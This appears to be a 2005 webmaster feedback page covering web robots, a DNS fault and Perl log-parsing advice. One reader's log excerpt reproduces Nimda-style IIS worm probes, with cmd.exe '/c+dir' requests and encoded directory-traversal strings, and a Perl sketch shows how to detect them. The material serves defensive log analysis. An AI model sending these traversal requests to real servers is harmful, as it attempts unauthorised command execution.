Message from iman

From: ssss@nodomain
Date: Sat, 1 Jan 2005 11:18:03 +1100 (EST)
Dear Webmaster,
-- Message Follows --
thanks i have a picture sex
-- Message Ends --
From: 80.191.11.17
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)
Ed: Well I'm glad to hear that one of our readers is happy! Enjoy your
pictures, wherever you got them from ... Just be careful you don't go
blind!
Well, he might be happy, but possibly a little confused, since we don't
offer such pictures at this website ...
Perhaps he intended this message for someone else?
Iman (if that is his name) sent this message from a netblock that is
owned by Alborz Computer Co., in Tehran. His browser also has the
FunWebProducts add-in, which according to most MS pundits is spyware. He
might be getting more than he bargained for ...
(Oh what a tangled web we weave ...)

Sqworm -- what is it?

Date: Tue, 18 Jan 2005 11:39:49 +1100
From: Jeremy Hill
Ed: The following message was sent from the PGTS Postmaster for update
of the robots file.
Dear Webmaster,
---------------
Name:Sqworm
Version:2.9.85
Email:
Comments: 'what is Sqworm? it was poking around my server.'
URL:
---------------
Ed: I replied as follows:
G'day,
Not really sure what Sqworm is. When did you see it?
The last time I saw it was 2004-08-04 00:16:37 GMT
The netblock 66.194.6.0/24 is currently owned by Websense (delegated by
Time Warner Telecom)
This is all I can discover about them:
OrgName: Websense
OrgID: WEBSEN-1
Address: 10240 Sorrento Valley Rd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US
NetRange: 66.194.6.0 - 66.194.6.255
CIDR: 66.194.6.0/24
NetName: TWTC-NETBLK-4
NetHandle: NET-66-194-6-0-1
Parent: NET-66-192-0-0-1
NetType: Reassigned
RegDate: 2004-01-26
Updated: 2004-01-26
As far as I can tell, the agent they dispatched is a robot. It didn't
read robots.txt. It is not aggressive and does not appear impolite.
There have been far more hits to my site from people searching for
information about Sqworm than there have been from Sqworm itself.
I find nothing suspicious about this organisation or their robot (except
the name, which is a bit peculiar).
Cheers,
Gerry Patterson
For more information, see below.

Re: Sqworm -- what is it?

From: Jeremy Hill
Date: Tue, 18 Jan 2005 04:13:35 GMT
Ed: Jeremy replied as follows:
Gerry,
I am new to web hosting. I set up an Abyss server on my pc 3 days ago,
and am just learning to look over my logs. Here is an excerpt from my
log file when Sqworm showed up. Directly after that hit I had some
unidentified hits poking around looking for scripts and executables.
This is somewhat disturbing to me.
-------------
66.194.6.4 - - [16/Jan/2005:08:37:31 -0600] "GET / HTTP/1.0" 200 9961 "" "Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)"
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
-----------
I don't know if the 2 IPs are related. I traced the Sqworm IP (using the
'Tracert' tool at www.DNSstuff.com) to a record for "Office of the
Future", apparently last registered in 1992. The IP goes to a UNIX
server {core-02-so-0-0-0-0.phnx.twtelecom.net.}, where it appears there
is a firewall blocking the 'Tracert' tool.
The other IP goes to a Microsoft server on Comcast
{pcp0010510861pcs.limstn01.de.comcast.net.}
As I said before I don't know if these two entries are related, but they
appear in my log exactly as recorded above.
Hopefully this is useful information.
Thanks,
Jeremy Hill
Ed: Jeremy,
It is unlikely that these entries are related.
The hits from 68.44.229.242 are from a worm which infects only IIS
servers. I believe it may be a variant of Nimda.
For more information about the worm see below.
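For anyone who wants to flag probes like these in their own logs, here is a
minimal Perl sketch. The tell-tale signature is the request for cmd.exe or
root.exe; the log filename is assumed to be given on the command line, and
everything else is just an illustration, not part of any particular worm
scanner.

```perl
#!/usr/bin/perl
# Sketch: count Nimda-style probes (cmd.exe / root.exe requests)
# per source IP in an Apache combined-format access log.
use strict;
use warnings;

# Returns the source IP if the line looks like a worm probe, else undef.
sub probe_ip {
    my ($line) = @_;
    return unless $line =~ m{"GET [^"]*(?:cmd\.exe|root\.exe)};
    my ($ip) = $line =~ /^(\S+)/;
    return $ip;
}

my %probes;
if (@ARGV) {                       # e.g. perl probes.pl access.log
    while (my $line = <>) {
        my $ip = probe_ip($line) or next;
        $probes{$ip}++;
    }
    printf "%-15s %d\n", $_, $probes{$_} for sort keys %probes;
}
```

Run against Jeremy's excerpt, this would report fourteen probes from
68.44.229.242 and none from the Sqworm address.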
Sqworm, despite the name, is actually a robot, and on my site it behaves
like one.
It appears that someone else sent some feedback about Sqworm here.
Unfortunately, at the time I was neglecting my website, so ... my
apologies to Martha. I have since done some research on Sqworm and
investigated Websense.
It appears that the robot Sqworm is ridgy-didge (that's Australian for
OK). The netblock is owned by Websense, as previously noted. Websense is
a medium-to-large US corporation that sells web-filtering software for
proxy servers. They claim to be able to categorise websites, and this
robot is probably part of that categorisation effort, used to build
their website database.
The name "worm" has come into considerable disrepute, and this no doubt
accounts for the general sense of unease that surrounds the Sqworm
robot. That unease is nevertheless unfounded: Sqworm is only guilty of
being christened with what, at best, could be described as "an
unfortunate choice of name".
I also believe that Websense could do a better job of explaining what
their robot does and how their categories work. The whole enterprise
seems too secretive.
If anyone knows different, please let me know.
There is more information about Sqworm in the PGTS blog.
Nimda:
The second IP address in Jeremy's email belongs to a real worm.
This netblock is owned by Comcast Cable Communications, Inc., Cherry Hill
NJ, a large US cable company. The nethandle is NET-68-44-0-0-1, CIDR
68.44.0.0/15.
Someone is running an IIS server on one of Comcast's addresses and it has
been infected.
This IP address returns 7 positives from the openRBL.
So their Internet experience is likely to be somewhat diminished. They
probably don't know any better.
Blars has listed them ... He's a cruel man. Cruel but fair.

Just Testing

From: Anonymous
Date: Wed, 19 Jan 2005 11:24:26 +1100 (EST)
Ed: I received the following notification from the PGTS postmaster:
Dear Webmaster,
My agent string is: Interwebthingy Exploder 8.0000001 (standards compatible; W3C 4.01; [en-GB])
My IP address is: 217.44.1.8
---------------
Name:unknown
Version:
Comments: This is a fake string I entered because I felt like it. And
because it helps me analysing my own logfiles because I can
filter my own visits.
Owner:
OS:
Ed: I use a combination of agent_string and IP address. That way
webmaster hits do not get counted in any stats.
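A sketch of that kind of filter in Perl. The agent string and IP address
below are simply the ones quoted in the message above; a real filter would
substitute your own values.

```perl
#!/usr/bin/perl
# Sketch: skip the webmaster's own hits when tallying log stats.
# The IP and agent string are just the examples from this message.
use strict;
use warnings;

my $MY_IP    = '217.44.1.8';
my $MY_AGENT = qr/Interwebthingy Exploder/;

# Returns true when a combined-format log line is one of our own visits.
sub own_hit {
    my ($line) = @_;
    my ($ip) = $line =~ /^(\S+)/;
    return 0 unless defined $ip;
    return ($ip eq $MY_IP && $line =~ $MY_AGENT) ? 1 : 0;
}

my $hits = 0;
if (@ARGV) {                      # e.g. perl stats.pl access.log
    while (my $line = <>) {
        next if own_hit($line);   # webmaster hits don't get counted
        $hits++;
    }
    print "countable hits: $hits\n";
}
```

Matching on both fields means a visitor who fakes the same agent string,
or another user on the same IP, still gets counted.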
BTW: Coming soon ... An updated version of the agent_string information
panels that will enable readers to add their own comments.

PGTS website

From: Stephen Hampson
Date: Wed, 19 Jan 2005 13:06:14 +1100
Hi Gerry,
I'm not sure if you are aware, but a lot of the time when I try to reach
your website it is unavailable. The DNS seems not to resolve. When I try
to ping your hostname I get: "Ping request could not find host
www.pgts.com.au/ Please check the name and try again."
Thanks
Steve
Ed: I thought that this might be a network problem, upstream, since I
have accessed my website many times in the Melbourne metropolitan area,
without any obvious problems. It turned out that this was a network
problem, and the problem was my network!
More below ...

PGTS website (2)

Date: Thu, 20 Jan 2005 13:14:19 +1100
From: Stephen Hampson
Gerry,
I'm not sure what you are looking for with the pings, but I'll forward
them to you.
As I said before, the DNS server on 203.213.17.10 is either not
running or is unreachable.
If you log into that box and run:
dig @127.0.0.1 www.pgts.com.au
What is the output?
Thanks
Steve
Ed: Unfortunately I did not read Steve's email carefully. I checked my
primary DNS, saw that it was working (of course) ... but he was asking
about my secondary DNS!
He was away the next day, and did not get my email until Monday ...
Fortunately he persisted ... and in one of those awful (dohhh!) moments,
I realised that my secondary DNS was not running! I had altered some of
the startup scripts and restarted the server when I upgraded to postgres
7.4.5. Deep embarrassment here! I started named.
(see Steve's next email here)

Linknzbot

From: "Dave"
Date: Sun, 23 Jan 2005 14:10:31 +1300
> ----- Original Message -----
> From: "PGTS Webmaster" <webmaster@pgts.com.au>
> To: <webmaster@linknz.co.nz>
> Sent: Sunday, January 23, 2005 12:10 PM
> Subject: Link With PGTS.com.au
Hi, and thanks for listing my search engine on your web site. I have just
sent in my web spidering robot (linknzbot) to index your web site into
the search engine. It reported the following searchable links from your
web site:
links found : 17
http://www.pgts.com.au/
http://www.pgts.com.au/page01.html
http://www.pgts.com.au/page02.html
http://www.pgts.com.au/page03.html
http://www.pgts.com.au/download/
http://www.pgts.com.au/page04.php
http://www.pgts.com.au/pgtsj/
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0412
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0211a
http://www.pgts.com.au/pgtsj/0501.html
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204a
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204b
http://www.pgts.com.au/cgi-bin/psql?feedback
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0309b
http://www.pgts.com.au/cgi-bin/psql?blog
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0302a
Optimizing tables...
Indexing complete !
People who use the linknz search engine can now find and visit your web
site.
Many regards
Dave Andrews
P.S. you should find a new USER AGENT STRING in your log files for the
linknzbot which is our web spidering robot, written in C++.
Ed: G'day Dave,
Thanks for your feedback.
I started the Robots Collections a couple of years ago as a sort of
hobby, because I was looking for things to write about when I started
publishing articles online. It has turned out to be a very popular topic
with webmasters, and for that reason I am trying to categorise Bots
when I see them. I have now settled on the following categories (not
mutually exclusive):
Aggressive
Hard-hitting
Impolite
Suspicious
The default category is blank, which implies that the Bot is polite,
obeys robots.txt instructions, does not attempt to cloak or disguise
its behaviour, and is not associated with criminal activities or
spamming (which these days looks increasingly as if it will also be
considered criminal). Over the next couple of months, I will be updating
the collection to reflect these categories.
I almost classified your Bot as Hard-hitting. 366 hits in 12 minutes is
sort of borderline. However, since they were mostly HEADs rather than
GETs, I just made a note in the comments section.
Might I suggest that if you intend to make your crawl sessions any
longer, you introduce a delay.
Regards,
Gerry Patterson
SysAdmin PGTS Pty Ltd
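Ed: the delay suggested above is usually just a pause between requests. A
minimal sketch in Perl follows; the fetch callback and the delay value are
arbitrary illustrations (linknzbot itself is written in C++, and this is
not its code).

```perl
#!/usr/bin/perl
# Sketch: pausing between requests so a crawl doesn't hammer a site.
use strict;
use warnings;

# $fetch is a coderef that retrieves one URL; $delay is in seconds.
sub crawl {
    my ($fetch, $delay, @urls) = @_;
    my $n = 0;
    for my $url (@urls) {
        $fetch->($url);
        $n++;
        sleep $delay if $n < @urls;   # no need to pause after the last one
    }
    return $n;                        # number of pages fetched
}
```

With a one-second delay, 366 hits would be spread over six minutes or so
of actual fetching plus six minutes of sleeping, which most webmasters
would barely notice.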

PGTS website (3)

Date: Mon, 24 Jan 2005 10:13:57 +1100
From: "Stephen Hampson"
Yeah, no worries. That was what I was trying to tell you. It looks like
Windows DNS does not fail over properly. So if it hits the secondary DNS
server (50% chance, because it works in a round-robin way), then there is
a fair chance it will never try the primary DNS server and will just
fail.
Just tried your site then and it works. It wasn't working about 30 mins
ago due to this issue. I'll let you know if I experience problems again.
Ed: And I am very grateful that Steve persisted ... despite me being so
relentlessly thick-headed!
Of course it helps if named is running on your DNS server!
I hadn't realised that Windows DNS servers worked that way ... Obviously
I am going to have to fix up those startup scripts. And all those other
people using Windows DNS may find that my site works more than 50% of
the time now!

"bad file" error in coldarch script

From: Grant September
Date: Mon, 24 Jan 2005 22:31:08 +1100 (EST)
Dear Webmaster,
-- Message Follows --
Hi there, I tried to use your coldarch.pl file on NT, but kept getting a
"Bad file" error. I think this is due to my path having a space in the
name. Do you have a workaround for this, as I have no Perl programming
skills?
Ed: I'm sorry Grant, but I have not allowed for spaces in data_file
names.

New Robot LimeBot

From: Kenn Sippell
Date: Tue, 25 Jan 2005 05:08:31 +1100 (EST)
Dear Webmaster,
-- Message Follows --
I would like you to be aware of the web robot known as LimeBot - written
as part of the free enterprise initiative Cruise Lime. The bot
identifies itself with the User-Agent:
'LimeBot/1.0 (+www.cruiselime.com/LimeBot.php)'.
I would appreciate it if you included it in your databases for the
convenience of those who use your search.
-- Message Ends --
Ed: I replied as follows ...
Kenn,
The agent_strings are added automatically when visitors come to this
site. If you are part of the Cruise Lime enterprise, then I suggest you
send LimeBot to my site. It will be included within 24 hours, and I will
approve the entry when I see it.
The LimeBot was first seen in the PGTS logs at 2005-01-25 11:12 GMT.

Getting file types from log file

From: Khoa Nguyen
Date: Fri, 28 Jan 2005 12:31:08 +1100 (EST)
Dear Webmaster,
-- Message Follows --
Hi, thanks for the info posted on the site. It is useful for a better
understanding of the log file.
On the web page, you print out 4 columns: IP, Date, Time, and Target. I
have trouble separating the file name from the file type. For example,
for the Target part, what if I only want to print out the type of file
requested (txt, html, ...) instead of the whole file name (data.html)?
What if I only want to count how many hits each file type has, instead
of how many times the file is requested? When searching through the log
file, I could search for the file request, but couldn't search for the
file type.
I have something like:
"/\/[\w\d\-\.]+\s/" Please advise. Much appreciated. Thanks
Ed: Khoa,
Sorry not to answer this sooner.
I have been trying to find time to re-write some of the scripts, and I
was hoping to come up with a script that answers this.
Unfortunately I did not get around to doing it.
I do have a script, which is hooked into the PGTS database. The way I
try to determine the type is by examining the file extensions.
Obviously this will be site-dependent. However, you could come up with a
general solution which uses standard MIME types.
The script I have is actually rather complex. It examines each IP
address and looks for "Robot" behaviour.
e.g. suppose we have a subroutine called parse_log which splits each
line into its individual components; then:
($IP,$htime,$cmd,$status,$bytes,$referer,$agent) = parse_log($_);
# this assigns the components
# ($page would be the requested path, extracted from $cmd)
# then we can test for the MIME types
unless ($page) {
    $page_type = $NULL;
}
elsif ($page =~ /\.jpg$/ || $page =~ /\.gif$/) {
    $page_type = $IMAGE;
}
elsif ($page =~ /\.exe$/ || $page =~ /\.gz$/ ||
       $page =~ /\.msi$/ || $page =~ /\.zip$/) {
    $page_type = $BIN;
}
elsif ($page =~ /robots\.txt$/) {
    $page_type = $ROBOT;
}
elsif ($page =~ /\.txt$/ || $page =~ /-HOWTO$/) {
    $page_type = $TXT;
}
etc ... etc
This is rather cumbersome, but it allows you to tailor the results for
your site. You may have particular standards: you may only use gif, jpg
and png, or you may do as I do and put all images in the same folder, in
which case you would test the first part of $page to see if it was in
the folder called /image, etc.
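To answer the counting part of the question directly, here is a minimal
sketch that tallies hits per file type rather than per file. The
extension-to-type map is only an example; adjust it for your own site.

```perl
#!/usr/bin/perl
# Sketch: count hits per file type (by extension) from a combined log.
use strict;
use warnings;

# Example map only -- extend with whatever extensions your site serves.
my %type_of = (
    jpg => 'image', gif => 'image', png => 'image',
    txt => 'text',  html => 'html', zip => 'binary',
);

# Classify one log line by the extension of the requested path.
sub page_type {
    my ($line) = @_;
    my ($path) = $line =~ m{"(?:GET|HEAD|POST) (\S+)};
    return 'unknown' unless defined $path;
    $path =~ s/\?.*//;                    # drop any query string
    my ($ext) = $path =~ /\.(\w+)$/;
    return 'none' unless defined $ext;    # no extension at all
    return $type_of{lc $ext} || 'other';
}

my %count;
if (@ARGV) {                              # e.g. perl types.pl access.log
    $count{ page_type($_) }++ while <>;
    printf "%-8s %d\n", $_, $count{$_} for sort keys %count;
}
```

The query-string stripping matters on a site like this one, where pages
such as /cgi-bin/pgtsj?file=pgtsj0412 carry their real identity in the
query rather than in an extension.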
Hope this helps.